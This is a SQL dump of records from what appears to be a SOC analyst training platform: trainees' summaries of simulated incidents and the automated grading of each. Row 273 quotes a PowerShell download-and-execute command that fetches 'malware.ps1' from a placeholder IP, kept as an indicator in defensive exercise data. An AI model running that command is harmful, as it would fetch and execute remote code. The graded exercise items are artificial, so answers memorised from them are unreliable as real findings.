(272, 177, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 4:25:52 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T10:56:28.351Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-19 14:40:27', '2026-02-28 21:00:00', 0, NULL),
(273, 126, 637, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"ip-203.0.113.77\",\"hash-d41d8cd9\",\"cmd-1\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 19-2-2026, 21:43:04\\nALERT: Suspicious Process Execution Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.10\\n- [IP] 203.0.113.77\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [COMMAND] powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-19T20:43:17.501Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: command powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\') (1/2). Response actions correct (+30)\",\"missed_items\":[\"command: powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.77/malware.ps1\')\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-19 20:39:44', '2026-02-28 21:00:00', 0, NULL),
(274, 181, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 03:05:11', '2026-02-20 03:05:11', 0, NULL),
(275, 183, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 03:55:15', '2026-02-20 03:55:15', 0, NULL),
(276, 183, 767, 'investigating', NULL, NULL, NULL, NULL, '2026-02-20 07:46:11', '2026-02-20 04:38:11', '2026-02-20 04:38:11', 0, NULL),
(277, 184, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 3:13:01 AM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T08:13:36.075Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 08:05:25', '2026-02-28 21:00:00', 0, NULL),
(278, 184, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 3:16:22 AM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T08:16:25.168Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 08:13:36', '2026-02-28 21:00:00', 0, NULL),
(279, 184, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 08:16:25', '2026-02-20 08:16:25', 0, NULL),
(280, 185, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-20 08:58:30', '2026-02-20 08:58:30', 0, NULL),
(281, 185, 734, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.5\",\"ip-10.0.0.15\",\"domain-http://newve\",\"domain-newvendor.co\",\"artifact_1\"],\"selectedActions\":[],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 5:02:21 PM\\nALERT: False Positive Alert: Legitimate Email Flagged as Phishing\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.5\\n- [IP] 10.0.0.15\\n- [DOMAIN] http://newvendor.com/welcome\\n- [DOMAIN] newvendor.com\\n- [EMAIL] info@newvendor.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (0)\\n------------------------------\\n(No active containment measures)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T09:02:28.957Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Missed response actions (0/1)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-02-20 08:59:08', '2026-02-28 21:00:00', 0, NULL),
(282, 185, 750, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.1.20\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 5:05:21 PM\\nALERT: Suspicious Email Detected - Potential False Positive\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.1.20\\n- [URL] https://example-trusted-site.com/document\\n- [EMAIL] trusted.source@example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T09:05:24.412Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 09:04:33', '2026-02-28 21:00:00', 0, NULL),
(283, 185, 282, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-192.168.1.50\",\"hash-e99a18c4\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/20/2026, 5:07:37 PM\\nALERT: Malware Detected via Suspicious Process Execution\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 192.168.1.50\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [FILENAME] malicious.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-20T09:07:39.758Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-20 09:06:13', '2026-02-28 21:00:00', 0, NULL),
(284, 187, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-21 03:11:46', '2026-02-21 03:11:46', 0, NULL),
(285, 189, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/21/2026, 9:24:12 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-21T20:26:51.308Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"block_hash\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 19:38:33', '2026-02-28 21:00:00', 0, NULL),
(286, 189, 608, 'investigating', NULL, NULL, NULL, NULL, '2026-02-21 22:48:24', '2026-02-21 19:41:24', '2026-02-21 19:41:24', 0, NULL),
(287, 189, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\nDATE: February 21, 2026, 10:03:11 PM\\nALERT: BlackEnergy Malware Execution [Operation: Iron Grid]\\nVERDICT: True Positive\\n\\nKEY FINDINGS\\n\\n    Internal IP: 192.168.1.45\\n    Malicious IP: 203.0.113.50\\n    File Hash: d41d8cd98f00b204e9800998ecf8427e\\n    Filename: invoice.doc\\n    Username: jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED\\n\\n    Isolated Host\\n    Blocked IP/Domain\\n    Blocked File Hash\\n    Collected Forensics\\n    Escalated to Tier 3\\n\\nANALYSIS\\nThe investigation was concluded based on verified telemetry and adherence to playbook protocols. All identified threats have been neutralized or escalated following standard operating procedures.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-21T21:06:02.500Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 20:26:51', '2026-02-28 21:00:00', 0, NULL),
(288, 189, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"investigation executive summary:\\n\\nINVESTIGATION EXECUTIVE SUMMARY\\nDATE: February 21, 2026, 10:14:17 PM\\nALERT TITLE: Persistence Mechanism Established\\nOPERATION: Operation Iron Grid\\nVERDICT: True Positive\\n\\nKEY FINDINGS:\\n\\n    Malicious IP Address: 203.0.113.45\\n    Malware Hash: 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n    Internal IP Address: 10.0.1.15\\n    File Path: C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n    Compromised Username: compromised_user\\n\\nCONTAINMENT MEASURES IMPLEMENTED:\\n\\n    Host isolation\\n    IP/Domain blocking\\n    File hash blocking\\n    Forensic data collection\\n    Escalation to Tier 3\\n\\nANALYSIS:\\nThe investigation has been concluded following thorough verification of telemetry data and adherence to established playbook protocols. All identified threats have been effectively neutralized or escalated for further action as per standard operating procedures.\\n\\nSIGNED:\\nAmadou Mane\\nSenior SOC Analyst\",\"submitted_at\":\"2026-02-21T21:16:13.301Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (5/6)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 21:06:02', '2026-02-28 21:00:00', 0, NULL),
(289, 189, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n================================\\nDATE: February 21, 2026, 11:15:46 PM\\nALERT: Lateral Movement to OT Network [Operation: Iron Grid]\\nVERDICT: True Positive\\n\\nKEY FINDINGS\\n----------------\\n\\n    Source IP: 192.168.1.101\\n    Destination IP: 10.0.0.5\\n    Malicious Hash: 5f4dcc3b5aa765d61d8327deb882cf99\\n    Compromised Username: jdoe\\n    External IP: 203.0.113.55\\n\\nCONTAINMENT MEASURES IMPLEMENTED\\n---------------------------------\\n\\n    Host Isolation\\n    IP/Domain Blocking\\n    File Hash Blocking\\n    Forensic Data Collection\\n    Escalation to Tier 3\\n\\nANALYSIS\\n---------\\nThe investigation has been concluded based on corroborated telemetry and adherence to playbook protocols. All identified threats have been effectively neutralized or escalated following standard operating procedures.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-21T22:19:53.145Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"reset_credentials\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 21:16:13', '2026-02-28 21:00:00', 0, NULL),
(290, 189, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\nDATE: February 21, 2026, 11:27:53 PM\\nALERT: SCADA System Compromise [Operation: Iron Grid]\\nVERDICT: True Positive\\n\\nKEY FINDINGS (6)\\n\\n    [IP] 192.168.1.105\\n    [IP] 10.0.0.20\\n    [HASH] 5d41402abc4b2a76b9719d911017c592\\n    [IP] 203.0.113.45\\n    [FILENAME] malicious_script.sh\\n    [USERNAME] unauthorized_user\\n\\nCONTAINMENT MEASURES IMPLEMENTED (6)\\n\\n    Isolate Host\\n    Block IP/Domain\\n    Block File Hash\\n    Reset Credentials\\n    Collect Forensics\\n    Escalate to Tier 3\\n\\nANALYSIS\\nThe investigation has concluded based on validated telemetry and adherence to playbook protocols. All identified threats have been either neutralized or escalated according to standard operating procedures.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-21T22:29:17.197Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 22:19:55', '2026-02-28 21:00:00', 0, NULL),
(291, 189, 274, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:31:44 AM\\nALERT: Phishing Attempt via Weaponized Job Offers [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [EMAIL] recruiter@example.com\\n- [FILENAME] JobOffer.docm\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\\nAnalyst\",\"submitted_at\":\"2026-02-22T00:32:12.388Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-21 22:30:34', '2026-02-28 21:00:00', 0, NULL),
(292, 189, 275, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.5\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_1\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:34:17 AM\\nALERT: Malicious Code Execution on Developer Systems [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.5\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\\n- [USERNAME] dev_user01\\n- [FILENAME] malicious_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-22T00:34:34.538Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:32:14', '2026-02-28 21:00:00', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(293, 189, 276, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-10.0.0.5\",\"ip-203.0.113.45\",\"hash-3f5d8f3e\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:36:27 AM\\nALERT: Establishing Persistence and Lateral Movement [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 10.0.0.5\\n- [IP] 203.0.113.45\\n- [HASH] 3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\\n- [USERNAME] jdoe\\n- [FILENAME] persistence_tool.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-22T00:36:41.956Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:34:34', '2026-02-28 21:00:00', 0, NULL),
(294, 189, 277, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-e3b0c442\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 1:38:25 AM\\nALERT: Cryptocurrency Exfiltration and Laundering [OP: Operation Silent Tsunami]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [EMAIL] attacker@malicious.com\\n- [FILENAME] exfil_transaction_details.csv\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-22T00:38:38.823Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:36:41', '2026-02-28 21:00:00', 0, NULL),
(295, 189, 278, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/23/2026, 2:31:14 AM\\nALERT: Compromised Update Detected [OP: Operation Glass Serpent]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e5d8870e5bdd26602c622b7e5b0f6b4c\\n- [FILENAME] lib_mgmt.dll\\n- [USERNAME] admin_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou Mane\",\"submitted_at\":\"2026-02-23T01:32:39.450Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 00:40:04', '2026-02-28 21:00:00', 0, NULL),
(296, 177, 934, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.89\",\"ip-192.168.10.10\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 2:28:46 PM\\nALERT: Brute Force Login Attempts Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.89\\n- [IP] 192.168.10.10\\n- [USERNAME] administrator\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-22T08:59:19.881Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/3)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-22 08:54:54', '2026-02-28 21:00:00', 0, NULL),
(297, 177, 717, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.20\",\"domain-http://malic\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"escalate\",\"collect_forensics\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/22/2026, 3:54:54 PM\\nALERT: Phishing Email with Malicious URL Detected\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.20\\n- [DOMAIN] http://malicious-site.com/login\\n- [EMAIL] no-reply@trustedservice.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst 